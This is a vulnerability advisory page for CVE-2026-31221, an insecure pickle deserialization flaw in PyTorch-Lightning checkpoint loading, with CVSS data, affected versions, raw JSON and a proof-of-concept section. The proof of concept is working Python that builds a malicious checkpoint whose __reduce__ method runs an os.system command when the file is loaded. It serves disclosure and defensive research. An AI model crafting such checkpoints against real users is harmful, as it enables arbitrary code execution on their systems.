Security Vulnerability Report
CVE-2026-31221 CVSS 7.8 HIGH

CVE-2026-31221

Published: 2026-05-12 16:16:14
Last Modified: 2026-05-14 18:54:36

Description

PyTorch-Lightning versions 2.6.0 and earlier contain an insecure deserialization vulnerability (CWE-502) in the checkpoint loading mechanism. The LightningModule.load_from_checkpoint() method, which is commonly used to load saved model states, internally calls torch.load() without setting the security-restrictive weights_only=True parameter. This default behavior allows the deserialization of arbitrary Python objects via the Pickle module. A remote attacker can exploit this by providing a maliciously crafted checkpoint file, leading to arbitrary code execution on the victim's system when the file is loaded.

CVSS Details

CVSS Score: 7.8
Severity: HIGH
CVSS Vector: CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:a:lightningai:pytorch_lightning:*:*:*:*:*:python:*:* - VULNERABLE
PyTorch-Lightning <= 2.6.0

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import os
import torch

# Define a malicious class to execute arbitrary code
class MaliciousPayload:
    def __reduce__(self):
        # The command to execute (e.g., creating a file or reverse shell)
        # In a real scenario, this could be a more sophisticated payload
        return (os.system, ('echo PWNED > /tmp/poc.txt',))

# Create a valid PyTorch Lightning checkpoint structure
# containing the malicious object
payload = MaliciousPayload()
checkpoint_data = {
    'state_dict': {'model': payload},  # Injecting payload into state dict
    'epoch': 1,
    'global_step': 100
}

# Save the crafted checkpoint file
print("[*] Generating malicious checkpoint file...")
torch.save(checkpoint_data, "malicious_checkpoint.ckpt")
print("[+] Malicious checkpoint created: malicious_checkpoint.ckpt")

# --- VICTIM SIDE (Vulnerable Code) ---
# The following code demonstrates the vulnerability:
#
# import pytorch_lightning as pl
#
# class DummyModel(pl.LightningModule):
#     def __init__(self):
#         super().__init__()
#
# # Loading the malicious file triggers the exploit
# # This calls torch.load internally without weights_only=True
# model = DummyModel.load_from_checkpoint("malicious_checkpoint.ckpt")
#
# Result: The command 'echo PWNED > /tmp/poc.txt' will be executed.

References

https://github.com/Lightning-AI/pytorch-lightning (Product)
https://www.notion.so/CVE-2026-31221-35d1e1393188815f8db7c4fd08076639 (Exploit, Third Party Advisory)

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-31221", "sourceIdentifier": "[email protected]", "published": "2026-05-12T16:16:14.020", "lastModified": "2026-05-14T18:54:35.520", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "PyTorch-Lightning versions 2.6.0 and earlier contain an insecure deserialization vulnerability (CWE-502) in the checkpoint loading mechanism. The LightningModule.load_from_checkpoint() method, which is commonly used to load saved model states, internally calls torch.load() without setting the security-restrictive weights_only=True parameter. This default behavior allows the deserialization of arbitrary Python objects via the Pickle module. A remote attacker can exploit this by providing a maliciously crafted checkpoint file, leading to arbitrary code execution on the victim's system when the file is loaded."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "baseScore": 7.8, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-502"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:lightningai:pytorch_lightning:*:*:*:*:*:python:*:*", "versionEndIncluding": "2.6.0", "matchCriteriaId": "679C8CD0-8E18-4311-BF0C-776968832B4F"}]}]}], "references": [{"url": "https://github.com/Lightning-AI/pytorch-lightning", "source": "[email protected]", "tags": ["Product"]}, {"url": "https://www.notion.so/CVE-2026-31221-35d1e1393188815f8db7c4fd08076639", "source": "[email protected]", "tags": 
["Exploit", "Third Party Advisory"]}]}}